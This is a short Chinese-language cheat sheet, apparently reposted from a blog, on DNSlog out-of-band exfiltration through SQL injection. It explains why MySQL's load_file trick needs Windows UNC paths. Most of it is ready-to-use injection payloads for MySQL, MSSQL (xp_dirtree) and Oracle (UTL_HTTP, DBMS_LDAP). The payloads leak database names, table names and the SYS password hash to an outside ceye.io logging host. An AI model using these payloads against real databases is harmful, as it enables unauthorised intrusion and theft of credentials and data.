show global variables like ‘%secure%‘;
查看secure_file_priv 的值
secure_file_priv =
Windows但不支持 Linux ,原因如下:load_file函数在Linux下是无法用来做dnslog攻击的,因为在这里就涉及到Windows的一个小Tips——UNC路径。
UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器. UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式
。因为Linux没有UNC路径这个东西,所以当MySQL处于Linux系统中的时候,是不能使用这种方式外带数据的
mysql 盲注构造 payload
and load_file(concat(‘\\\\‘,(select database()),‘.fbuf5n.ceye.io\\abc‘))
DECLARE @host varchar(1024);SELECT @host=(SELECT TOP 1 name from master.dbo.sysobjects where xtype = ‘u‘)+‘.fbut5n.ceye.io‘;EXEC(‘master..xp_dirtree"\\‘+@host+‘\foobar$"‘);
SELECT UTL_INADDR.GET_HOST_ADDRESS(‘ip.port.b182oj.ceye.io‘);SELECT UTL_HTTP.REQUEST(‘http://ip.port.b182oj.ceye.io/oracle‘) FROM DUAL;SELECT HTTPURITYPE(‘http://ip.port.b182oj.ceye.io/oracle‘).GETCLOB() FROM DUAL;SELECT DBMS_LDAP.INIT((‘oracle.ip.port.b182oj.ceye.io‘,80) FROM DUAL;SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name=‘SYS‘)||‘.ip.port.b182oj.ceye.io‘,80) FROM DUAL;
dnslog 平台:
原文:https://www.cnblogs.com/nice0e3/p/12786496.html